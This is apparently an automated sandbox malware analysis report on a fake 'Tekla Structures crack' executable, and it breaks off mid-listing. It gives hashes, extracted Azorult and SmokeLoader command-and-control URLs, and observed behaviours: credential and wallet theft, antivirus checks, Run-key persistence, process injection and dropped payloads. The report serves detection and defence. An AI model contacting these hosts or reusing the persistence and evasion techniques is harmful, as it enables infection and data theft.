Analysis
-
max time kernel
307s -
max time network
602s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 07:46
Static task
static1
Behavioral task
behavioral1
Sample
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
Resource
win10v20201028
General
-
Target
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
-
Size
5.4MB
-
MD5
baad366f257529076340afc66d1ac59c
-
SHA1
3dafcc431b85bd6a527e70879137e1f27e160849
-
SHA256
3f5a92454d1b626e24016329a9de52e40d78aae1e5977f53e820a2e2812d3975
-
SHA512
98d2e5ace89934ebc193ae6b8277b363d9d197a54bbcf6dfa3f40df2671d89c87e4d13737ea99eceb9a2a1ac3bd135ffa53d555f93f72ff2a36f1874cb94dd85
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral3/memory/2864-150-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/2864-153-0x0000000002590000-0x0000000002E9A000-memory.dmp family_glupteba behavioral3/memory/2864-154-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 7736 created 4240 7736 WerFault.exe RunWW.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 2212 created 2864 2212 svchost.exe app.exe PID 2212 created 5644 2212 svchost.exe app.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral3/memory/6200-280-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6200-282-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6200-296-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 14 IoCs
Processes:
msiexec.exeMsiExec.exepowershell.exeflow pid process 181 6200 msiexec.exe 251 6984 MsiExec.exe 254 6984 MsiExec.exe 258 6984 MsiExec.exe 260 6984 MsiExec.exe 262 6984 MsiExec.exe 296 6792 powershell.exe 260 6984 MsiExec.exe 260 6984 MsiExec.exe 262 6984 MsiExec.exe 181 6200 msiexec.exe 251 6984 MsiExec.exe 254 6984 MsiExec.exe 258 6984 MsiExec.exe -
Drops file in Drivers directory 5 IoCs
Processes:
DrvInst.exeppppppfy.exeMicrosoft.exedescription ioc process File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ppppppfy.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Microsoft.exe File opened for modification C:\Windows\System32\drivers\SET866D.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET866D.tmp DrvInst.exe -
Executes dropped EXE 64 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exekey.exemultitimer.exesetups.exeaskinstall20.exesetups.tmpmultitimer.exemultitimer.exeKiffApp1.execpyrix.exetskbyhbbld2.exer1d0edpgrgd.exetskbyhbbld2.tmpSetup3310.exeSetup3310.tmpvict.exev3wwyw3mqci.exeapp.exevict.tmpFull Program Features.exeh3adlpt0ixf.exeIBInstaller_97039.exeIBInstaller_97039.tmpvpn.exevpn.tmpfile.exewinlthsth.exewin1host.exe5768.tmp.exe1.exe5C2B.tmp.exe2.exe5768.tmp.exeSetup.exe61F9.tmp.exehjjgaa.exeRunWW.exejg7_7wjg.exeLabPicV3.exelylal220.exe22.exeguihuali-game.exeHookSetp.exeThree.exe2oG1o0Zhe2Ng.exeLabPicV3.tmplylal220.tmpjfiag3g_gg.exeQJXVwuoxW.exeQJXVwuoxW.exeNoQIom6aF.exemd2_2efs.exeNoQIom6aF.exeppppppfy.exeMicrosoft.exejfiag3g_gg.exemultitimer.exesetups.exesetups.tmppid process 4076 keygen-pr.exe 3392 keygen-step-1.exe 4384 keygen-step-3.exe 4404 keygen-step-4.exe 1592 key.exe 1896 Setup.exe 2448 key.exe 224 multitimer.exe 4540 setups.exe 1388 askinstall20.exe 3096 setups.tmp 884 multitimer.exe 1280 multitimer.exe 4196 KiffApp1.exe 3668 cpyrix.exe 3144 tskbyhbbld2.exe 4880 r1d0edpgrgd.exe 1032 tskbyhbbld2.tmp 1004 Setup3310.exe 4416 Setup3310.tmp 2432 vict.exe 3140 v3wwyw3mqci.exe 2864 app.exe 1248 vict.tmp 4852 Full Program Features.exe 3972 h3adlpt0ixf.exe 4780 IBInstaller_97039.exe 2292 IBInstaller_97039.tmp 5180 vpn.exe 5276 vpn.tmp 5340 file.exe 5472 winlthsth.exe 5540 win1host.exe 5256 5768.tmp.exe 5620 1.exe 4896 5C2B.tmp.exe 3992 2.exe 4576 5768.tmp.exe 5920 Setup.exe 5320 61F9.tmp.exe 5124 hjjgaa.exe 4240 RunWW.exe 5352 jg7_7wjg.exe 3400 LabPicV3.exe 4704 lylal220.exe 2936 22.exe 3892 guihuali-game.exe 5892 HookSetp.exe 5776 Three.exe 4056 2oG1o0Zhe2Ng.exe 3984 LabPicV3.tmp 196 lylal220.tmp 6376 jfiag3g_gg.exe 6500 QJXVwuoxW.exe 6708 QJXVwuoxW.exe 6736 NoQIom6aF.exe 6880 md2_2efs.exe 6936 NoQIom6aF.exe 640 ppppppfy.exe 5888 Microsoft.exe 4764 jfiag3g_gg.exe 6300 multitimer.exe 6340 setups.exe 6480 setups.tmp -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
setups.tmpcmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 64 IoCs
Processes:
setups.tmptskbyhbbld2.tmpSetup3310.tmpvict.tmph3adlpt0ixf.exeIBInstaller_97039.tmpvpn.tmprundll32.exelylal220.tmpLabPicV3.tmpMsiExec.exesetups.tmprundll32.exerundll32.exeMsiExec.exevict.tmpSetup3310.tmpvpn.tmptoolspab1.execlient32.exemask_svc.exepid process 3096 setups.tmp 3096 setups.tmp 3096 setups.tmp 3096 setups.tmp 3096 setups.tmp 3096 setups.tmp 3096 setups.tmp 1032 tskbyhbbld2.tmp 4416 Setup3310.tmp 4416 Setup3310.tmp 1248 vict.tmp 3972 h3adlpt0ixf.exe 2292 IBInstaller_97039.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5720 rundll32.exe 196 lylal220.tmp 3984 LabPicV3.tmp 5744 MsiExec.exe 5744 MsiExec.exe 5744 MsiExec.exe 6480 setups.tmp 6480 setups.tmp 6480 setups.tmp 6480 setups.tmp 6480 setups.tmp 6480 setups.tmp 6480 setups.tmp 3592 rundll32.exe 5804 rundll32.exe 6984 MsiExec.exe 6984 MsiExec.exe 6984 MsiExec.exe 6984 MsiExec.exe 6984 MsiExec.exe 6984 MsiExec.exe 6984 MsiExec.exe 6984 MsiExec.exe 6984 MsiExec.exe 6984 MsiExec.exe 4600 vict.tmp 2364 Setup3310.tmp 2364 Setup3310.tmp 5660 vpn.tmp 5660 vpn.tmp 5660 vpn.tmp 5660 vpn.tmp 5816 toolspab1.exe 6632 client32.exe 6632 client32.exe 6632 client32.exe 6632 client32.exe 6632 client32.exe 6632 client32.exe 7560 mask_svc.exe 7560 mask_svc.exe 7560 mask_svc.exe 7560 mask_svc.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
Processes:
5C2B.tmp.exeaipackagechainer.exemultitimer.exeppppppfy.exeMicrosoft.exemultitimer.exehjjgaa.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5C2B.tmp.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\255vkfq2rjc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\JOTHPPP6O1\\multitimer.exe\" 1 3.1617436183.60681e179c978" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Kybysaluke.exe\"" ppppppfy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Kuxefedype.exe\"" Microsoft.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fooxzg3bqk1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2DWOB7T3RC\\multitimer.exe\" 1 3.1617436098.60681dc2a5353" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" 5C2B.tmp.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
Processes:
multitimer.exemultitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg7_7wjg.exemd6_6ydj.exemd6_6ydj.execmd.exemd2_2efs.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg7_7wjg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md6_6ydj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md6_6ydj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeh3adlpt0ixf.exedescription ioc process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: h3adlpt0ixf.exe File opened (read-only) \??\R: h3adlpt0ixf.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: h3adlpt0ixf.exe File opened (read-only) \??\S: h3adlpt0ixf.exe File opened (read-only) \??\Y: h3adlpt0ixf.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: h3adlpt0ixf.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\K: h3adlpt0ixf.exe File opened (read-only) \??\L: h3adlpt0ixf.exe File opened (read-only) \??\U: h3adlpt0ixf.exe File opened (read-only) \??\W: h3adlpt0ixf.exe File opened (read-only) \??\T: h3adlpt0ixf.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: h3adlpt0ixf.exe File opened (read-only) \??\F: h3adlpt0ixf.exe File opened (read-only) \??\H: h3adlpt0ixf.exe File opened (read-only) \??\Q: h3adlpt0ixf.exe File opened (read-only) \??\E: h3adlpt0ixf.exe File opened (read-only) \??\J: h3adlpt0ixf.exe File opened (read-only) \??\O: h3adlpt0ixf.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: h3adlpt0ixf.exe File opened (read-only) \??\Z: h3adlpt0ixf.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: h3adlpt0ixf.exe File opened (read-only) \??\M: h3adlpt0ixf.exe File opened (read-only) \??\P: h3adlpt0ixf.exe File opened (read-only) \??\V: h3adlpt0ixf.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 91 ipinfo.io 158 api.ipify.org 172 ip-api.com 295 ipinfo.io 298 ipinfo.io 354 ip-api.com 87 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 20 IoCs
Processes:
DrvInst.exeDrvInst.exesvchost.exetapinstall.exedescription ioc process File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\39RE12PL.cookie svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c}\SET7F59.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c}\SET7F5A.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c}\SET7F6A.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c} DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c}\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c}\SET7F6A.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c}\tap0901.sys DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c}\SET7F5A.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\39RE12PL.cookie svchost.exe File created C:\Windows\System32\DriverStore\Temp\{7de6c7c8-eecd-5342-8301-3e3ddfff313c}\SET7F59.tmp DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
mask_svc.exemask_svc.exemask_svc.exepid process 7364 mask_svc.exe 7320 mask_svc.exe 7560 mask_svc.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
key.exesvchost.exe5768.tmp.exe5C2B.tmp.exeQJXVwuoxW.exeNoQIom6aF.exe2oG1o0Zhe2Ng.exe2.exetoolspab1.exe2.exedescription pid process target process PID 1592 set thread context of 2448 1592 key.exe key.exe PID 4784 set thread context of 5824 4784 svchost.exe svchost.exe PID 5256 set thread context of 4576 5256 5768.tmp.exe 5768.tmp.exe PID 4896 set thread context of 4628 4896 5C2B.tmp.exe DllHost.exe PID 4896 set thread context of 6200 4896 5C2B.tmp.exe msiexec.exe PID 6500 set thread context of 6708 6500 QJXVwuoxW.exe QJXVwuoxW.exe PID 6736 set thread context of 6936 6736 NoQIom6aF.exe NoQIom6aF.exe PID 4056 set thread context of 6392 4056 2oG1o0Zhe2Ng.exe AddInProcess32.exe PID 3992 set thread context of 5420 3992 2.exe 2.exe PID 1912 set thread context of 5816 1912 toolspab1.exe toolspab1.exe PID 6600 set thread context of 7688 6600 2.exe 2.exe -
Drops file in Program Files directory 64 IoCs
Processes:
guihuali-game.exejg7_7wjg.exetskbyhbbld2.tmpvpn.tmpSetup.exeirecord.tmpprolab.tmp22.exeppppppfy.exeIBInstaller_97039.tmpFull Program Features.exevict.tmpMicrosoft.exedescription ioc process File created C:\Program Files\unins0000.dat guihuali-game.exe File created C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\tmp.edb jg7_7wjg.exe File opened for modification C:\Program Files (x86)\viewerise\NDP472-KB4054531-Web.exe tskbyhbbld2.tmp File created C:\Program Files (x86)\MaskVPN\is-PT7EV.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-H0DT7.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe Setup.exe File opened for modification C:\Program Files (x86)\I-record\swresample-0.dll irecord.tmp File opened for modification C:\Program Files (x86)\I-record\swscale-2.dll irecord.tmp File created C:\Program Files (x86)\I-record\is-31JQJ.tmp irecord.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-U0CFO.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-S55IP.tmp vpn.tmp File opened for modification C:\Program Files (x86)\I-record\avdevice-53.dll irecord.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-GSB95.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-FKLKG.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Picture Lab\AForge.dll prolab.tmp File created C:\Program Files (x86)\I-record\is-29B7E.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-II7LJ.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe Setup.exe File opened for modification C:\Program Files (x86)\Picture Lab\SourceLibrary.dll prolab.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe Setup.exe File created C:\Program Files\javcse\license.dat 22.exe File created C:\Program Files\Mozilla Firefox\KKJMEKPBDP\prolab.exe ppppppfy.exe File opened for modification C:\Program Files (x86)\Install engine 16\Swap.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\Install engine 16\unins000.dat IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-33A11.tmp vpn.tmp File created C:\Program Files (x86)\Picture Lab\is-51VVT.tmp prolab.tmp File created C:\Program Files (x86)\Picture Lab\is-8GKRO.tmp prolab.tmp File created C:\Program Files (x86)\I-record\is-1GGBL.tmp irecord.tmp File created C:\Program 